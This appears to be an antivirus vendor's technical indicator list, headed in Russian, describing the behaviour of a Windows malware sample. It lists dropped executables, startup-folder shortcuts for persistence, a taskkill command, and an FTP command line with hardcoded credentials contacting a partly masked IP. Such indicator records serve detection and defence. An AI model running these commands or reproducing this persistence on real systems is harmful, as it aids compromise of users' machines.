Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\hdrunme.exe.lnk
- '%WINDIR%\zdydget.exe' -R -u h1 -p 123456 ftp://61.##1.172.125/
- '%WINDIR%\hdrunme.exe'
- '<SYSTEM32>\taskkill.exe' /f /im zdydget.exe
- %TEMP%\2791.bat
- %HOMEPATH%\ncftp\firewall.txt
- %HOMEPATH%\Desktop\hdrunme.exe.lnk
- %WINDIR%\zdydget.exe
- %WINDIR%\hdrunme.exe
- %TEMP%\2791.bat
- %TEMP%\2791.bat
- '61.##1.172.125':21
- DNS ASK 12#.###.161.61.in-addr.arpa
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''